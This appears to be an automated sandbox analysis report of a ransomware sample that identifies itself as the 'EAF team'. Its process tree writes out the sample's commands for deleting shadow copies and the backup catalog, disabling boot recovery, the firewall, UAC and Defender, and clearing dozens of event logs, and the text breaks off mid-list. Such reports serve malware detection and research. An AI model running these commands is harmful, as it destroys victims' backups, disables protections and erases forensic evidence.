PID 2340 wrote to memory of 3204	2340	[email protected]	112
PID 2340 wrote to memory of 3204	2340	[email protected]	112
PID 3204 wrote to memory of 4400	3204	cmd.exe	114
PID 3204 wrote to memory of 4400	3204	cmd.exe	114
PID 2340 wrote to memory of 3776	2340	[email protected]	115
PID 2340 wrote to memory of 3776	2340	[email protected]	115
PID 3776 wrote to memory of 3680	3776	cmd.exe	117
PID 3776 wrote to memory of 3680	3776	cmd.exe	117
PID 2340 wrote to memory of 2040	2340	[email protected]	119
PID 2340 wrote to memory of 2040	2340	[email protected]	119
PID 2040 wrote to memory of 1516	2040	cmd.exe	121
PID 2040 wrote to memory of 1516	2040	cmd.exe	121
PID 2040 wrote to memory of 3632	2040	cmd.exe	122
PID 2040 wrote to memory of 3632	2040	cmd.exe	122
PID 2040 wrote to memory of 1428	2040	cmd.exe	123
PID 2040 wrote to memory of 1428	2040	cmd.exe	123
PID 2040 wrote to memory of 1692	2040	cmd.exe	124
PID 2040 wrote to memory of 1692	2040	cmd.exe	124
PID 2040 wrote to memory of 1620	2040	cmd.exe	125
PID 2040 wrote to memory of 1620	2040	cmd.exe	125
PID 2040 wrote to memory of 2628	2040	cmd.exe	126
PID 2040 wrote to memory of 2628	2040	cmd.exe	126
PID 2040 wrote to memory of 3300	2040	cmd.exe	127
PID 2040 wrote to memory of 3300	2040	cmd.exe	127
PID 2040 wrote to memory of 3112	2040	cmd.exe	128
PID 2040 wrote to memory of 3112	2040	cmd.exe	128
PID 2040 wrote to memory of 1464	2040	cmd.exe	129
PID 2040 wrote to memory of 1464	2040	cmd.exe	129
PID 2040 wrote to memory of 4476	2040	cmd.exe	130
PID 2040 wrote to memory of 4476	2040	cmd.exe	130
PID 2040 wrote to memory of 1568	2040	cmd.exe	131
PID 2040 wrote to memory of 1568	2040	cmd.exe	131
PID 2040 wrote to memory of 3356	2040	cmd.exe	132
PID 2040 wrote to memory of 3356	2040	cmd.exe	132

System policy modification 1 TTPs 2 IoCs

evasion

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticecaption = "EAF"	[email protected]
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\legalnoticetext = "You were attacked by the EAF team plz read #FILES-ENCRYPTED.txt"	[email protected]

C:\Users\Admin\AppData\Local\Temp\sample.exe
"C:\Users\Admin\AppData\Local\Temp\sample.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3416
- C:\Users\Admin\AppData\Roaming\[email protected]
  "C:\Users\Admin\AppData\Roaming\[email protected]"
  2⤵
  - Modifies WinLogon for persistence
  - Modifies system executable filetype association
  - Executes dropped EXE
  - Modifies extensions of user files
  - Checks computer location settings
  - Drops startup file
  - Drops desktop.ini file(s)
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Drops file in Windows directory
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2340
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C reagentc /disable
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4120
  - - C:\Windows\system32\ReAgentc.exe
      reagentc /disable
      4⤵
      Drops file in System32 directory
      Drops file in Windows directory
      PID:4700
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4572
  - - C:\Windows\system32\wbadmin.exe
      wbadmin delete catalog -quiet
      4⤵
      Deletes backup catalog
      PID:4736
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1644
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:116
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:5096
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4108
  - - C:\Windows\system32\vssadmin.exe
      vssadmin delete shadows /all /quiet
      4⤵
      Interacts with shadow copies
      PID:1200
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic shadowcopy delete
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:720
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2736
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} bootstatuspolicy ignoreallfailures
      4⤵
      Modifies boot configuration data using bcdedit
      PID:1132
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4428
  - - C:\Windows\system32\bcdedit.exe
      bcdedit /set {default} recoveryenabled no
      4⤵
      Modifies boot configuration data using bcdedit
      PID:820
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C netsh advfirewall set currentprofile state off
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3204
  - - C:\Windows\system32\netsh.exe
      netsh advfirewall set currentprofile state off
      4⤵
      PID:4400
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C netsh firewall set opmode mode=disable
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3776
  - - C:\Windows\system32\netsh.exe
      netsh firewall set opmode mode=disable
      4⤵
      PID:3680
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C "C:\Windows\E27E20AC.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d "1" /f
      4⤵
      PID:1516
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" /v "ClientCacheTime" /t REG_DWORD /d "0" /f
      4⤵
      PID:3632
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
      4⤵
      PID:1428
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
      4⤵
      PID:1692
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "0" /f
      4⤵
      PID:1620
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "PromptOnSecureDesktop" /t REG_DWORD /d "0" /f
      4⤵
      PID:2628
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d "1" /f
      4⤵
      PID:3300
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "ConsentPromptBehaviorAdmin" /t REG_DWORD /d "0" /f
      4⤵
      PID:3112
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\CredSSP\Parameters" /v "AllowEncryptionOracle" /t REG_DWORD /d "2" /f
      4⤵
      PID:1464
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
      4⤵
      PID:4476
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoControlPanel" /t REG_DWORD /d "1" /f
      4⤵
      PID:1568
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "UserAuthentication" /t REG_DWORD /d "0" /f
      4⤵
      PID:3356
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v "fDenyTSConnections" /t REG_DWORD /d "0" /f
      4⤵
      PID:3308
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
      4⤵
      PID:2788
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas" /ve /t REG_SZ /d "Take Ownership" /f
      4⤵
      Modifies registry class
      PID:3640
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:3656
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
      4⤵
      Modifies registry class
      PID:1048
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\*\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F" /f
      4⤵
      Modifies registry class
      PID:4528
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas" /ve /t REG_SZ /d "Take Ownership" /f
      4⤵
      Modifies registry class
      PID:4688
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas" /v "NoWorkingDirectory" /t REG_SZ /d "" /f
      4⤵
      Modifies registry class
      PID:4348
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas\command" /ve /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
      4⤵
      Modifies registry class
      PID:4536
  - - C:\Windows\system32\reg.exe
      Reg.exe add "HKCR\Directory\shell\runas\command" /v "IsolatedCommand" /t REG_SZ /d "cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t" /f
      4⤵
      Modifies registry class
      PID:4980
- - C:\Windows\system32\NOTEPAD.EXE
    "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\#FILES-ENCRYPTED.txt
    3⤵
    PID:2668
- - C:\Windows\BackupXXXE27E20AC.exe
    "C:\Windows\BackupXXXE27E20AC.exe"
    3⤵
    - Executes dropped EXE
    - Checks computer location settings
    - Modifies registry class
    PID:4724
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1.cmd"
      4⤵
      PID:4040
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=20
        5⤵
        
        PID:1164
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL" /v "ClientCacheTime" /t REG_DWORD /d "0" /f
        5⤵
        
        PID:3848
    - - C:\Windows\system32\reg.exe
        
        Reg.exe add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
        5⤵
        
        PID:3748
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set currentprofile state off
        5⤵
        
        PID:1932
    - - C:\Windows\system32\netsh.exe
        
        netsh firewall set opmode mode=disable
        5⤵
        
        PID:4956
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} bootstatuspolicy ignoreallfailures
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:1232
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /set {default} recoveryenabled no
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:384
    - - C:\Windows\system32\wbadmin.exe
        
        wbadmin delete catalog -quiet
        5⤵
        Deletes backup catalog
        
        PID:2144
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic shadowcopy delete
        5⤵
        
        PID:2120
    - - C:\Windows\system32\vssadmin.exe
        
        vssadmin delete shadows /all /quiet
        5⤵
        Interacts with shadow copies
        
        PID:4820
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=25
        5⤵
        
        PID:4112
    - - C:\Windows\system32\PING.EXE
        
        ping localhost -n 8
        5⤵
        Runs ping.exe
        
        PID:1796
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\2.bat"
      4⤵
      PID:288
    - - C:\Windows\system32\mode.com
        
        mode con cols=74 lines=20
        5⤵
        
        PID:1136
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c WEVTUTIL EL
        5⤵
        
        PID:2936
      - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL EL
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "AMSI/Debug"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1920
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "AirSpaceChannel"
        5⤵
        
        PID:3000
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Analytic"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Application"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "DirectShowPluginControl"
        5⤵
        
        PID:1312
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Els_Hyphenation/Analytic"
        5⤵
        
        PID:2912
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "EndpointMapper"
        5⤵
        
        PID:3944
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "DirectShowFilterGraph"
        5⤵
        
        PID:1464
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "ForwardedEvents"
        5⤵
        
        PID:1416
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "FirstUXPerf-Analytic"
        5⤵
        
        PID:1908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "General Logging"
        5⤵
        
        PID:376
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "HardwareEvents"
        5⤵
        
        PID:4708
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "IHM_DebugChannel"
        5⤵
        
        PID:4196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Intel-iaLPSS-GPIO/Analytic"
        5⤵
        
        PID:2656
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Intel-iaLPSS-I2C/Analytic"
        5⤵
        
        PID:1640
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Debug"
        5⤵
        
        PID:4988
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Intel-iaLPSS2-GPIO2/Performance"
        5⤵
        
        PID:4952
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Intel-iaLPSS2-I2C/Debug"
        5⤵
        
        PID:4736
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Intel-iaLPSS2-I2C/Performance"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Internet Explorer"
        5⤵
        
        PID:3452
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Key Management Service"
        5⤵
        
        PID:732
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MF_MediaFoundationDeviceMFT"
        5⤵
        
        PID:444
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MF_MediaFoundationDeviceProxy"
        5⤵
        
        PID:2860
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MF_MediaFoundationFrameServer"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MedaFoundationVideoProc"
        5⤵
        
        PID:2692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MedaFoundationVideoProcD3D"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationAsyncWrapper"
        5⤵
        
        PID:2032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationContentProtection"
        5⤵
        
        PID:2932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationDS"
        5⤵
        
        PID:2936
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationDeviceProxy"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationMP4"
        5⤵
        
        PID:3556
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationMediaEngine"
        5⤵
        
        PID:1468
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPerformance"
        5⤵
        
        PID:1392
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPerformanceCore"
        5⤵
        
        PID:3112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPipeline"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3108
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationPlatform"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "MediaFoundationSrcPrefetch"
        5⤵
        
        PID:1312
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-AppV-Client-Streamingux/Debug"
        5⤵
        
        PID:1516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-AppV-Client/Admin"
        5⤵
        
        PID:1568
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-AppV-Client/Debug"
        5⤵
        
        PID:3656
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-AppV-Client/Operational"
        5⤵
        
        PID:4536
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-AppV-Client/Virtual Applications"
        5⤵
        
        PID:1048
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-AppV-SharedPerformance/Analytic"
        5⤵
        
        PID:1096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Admin"
        5⤵
        
        PID:5092
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Debug"
        5⤵
        
        PID:4368
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Client-Licensing-Platform/Diagnostic"
        5⤵
        
        PID:3848
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-IE/Diagnostic"
        5⤵
        
        PID:3560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-IEFRAME/Diagnostic"
        5⤵
        
        PID:4384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-JSDumpHeap/Diagnostic"
        5⤵
        
        PID:2736
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-OneCore-Setup/Analytic"
        5⤵
        
        PID:4572
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-PerfTrack-IEFRAME/Diagnostic"
        5⤵
        
        PID:1644
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-PerfTrack-MSHTML/Diagnostic"
        5⤵
        
        PID:4724
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-Admin/Debug"
        5⤵
        
        PID:4440
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Debug"
        5⤵
        
        PID:3908
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-Agent Driver/Operational"
        5⤵
        
        PID:4132
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Analytic"
        5⤵
        
        PID:2692
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Debug"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-App Agent/Operational"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-IPC/Operational"
        5⤵
        
        PID:968
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
        5⤵
        
        PID:3344
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
        5⤵
        
        PID:3040
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
        5⤵
        
        PID:1312
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AAD/Analytic"
        5⤵
        
        PID:1196
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AAD/Operational"
        5⤵
        
        PID:2960
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ADSI/Debug"
        5⤵
        
        PID:1308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ASN1/Operational"
        5⤵
        
        PID:5004
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ATAPort/General"
        5⤵
        
        PID:2076
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ATAPort/SATA-LPM"
        5⤵
        
        PID:3132
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ActionQueue/Analytic"
        5⤵
        
        PID:3356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-All-User-Install-Agent/Admin"
        5⤵
        
        PID:3516
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AllJoyn/Debug"
        5⤵
        
        PID:2580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AllJoyn/Operational"
        5⤵
        
        PID:384
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppHost/Admin"
        5⤵
        
        PID:1048
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppHost/ApplicationTracing"
        5⤵
        
        PID:3852
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppHost/Diagnostic"
        5⤵
        
        PID:3672
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppHost/Internal"
        5⤵
        
        PID:3872
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppID/Operational"
        5⤵
        
        PID:688
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppLocker/EXE and DLL"
        5⤵
        
        PID:4604
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppLocker/MSI and Script"
        5⤵
        
        PID:1560
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Deployment"
        5⤵
        
        PID:1144
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppLocker/Packaged app-Execution"
        5⤵
        
        PID:1940
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Admin"
        5⤵
        
        PID:5024
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Analytic"
        5⤵
        
        PID:1620
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Debug"
        5⤵
        
        PID:3112
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppModel-Runtime/Diagnostics"
        5⤵
        
        PID:4920
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppModel-State/Diagnostic"
        5⤵
        
        PID:1584
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppModel-State/Debug"
        5⤵
        
        PID:2984
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppReadiness/Admin"
        5⤵
        
        PID:4476
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppReadiness/Debug"
        5⤵
        
        PID:1932
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppReadiness/Operational"
        5⤵
        
        PID:3416
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppSruProv"
        5⤵
        
        PID:4356
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppXDeployment/Diagnostic"
        5⤵
        
        PID:1580
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppXDeployment/Operational"
        5⤵
        
        PID:3636
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Debug"
        5⤵
        
        PID:4404
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
        5⤵
        
        PID:816
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Operational"
        5⤵
        
        PID:1452
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-AppXDeploymentServer/Restricted"
        5⤵
        
        PID:2088
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Analytic"
        5⤵
        
        PID:5008
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-ApplicabilityEngine/Operational"
        5⤵
        
        PID:4032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Admin"
        5⤵
        
        PID:4044
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Analytic"
        5⤵
        
        PID:1032
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Debug"
        5⤵
        
        PID:2096
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application Server-Applications/Operational"
        5⤵
        
        PID:4308
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
        5⤵
        
        PID:3852
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        5⤵
        
        PID:1136
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
        5⤵
        
        PID:4108
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
        5⤵
        
        PID:3764
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        5⤵
        
        PID:4552
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Inventory"
        5⤵
        
        PID:3776
    - - C:\Windows\system32\wevtutil.exe
        
        WEVTUTIL CL "Microsoft-Windows-Application-Experience/Program-Telemetry"
        5⤵
        
        PID:1552
    - - C:\Windows\system32\wevtutil.exe
        
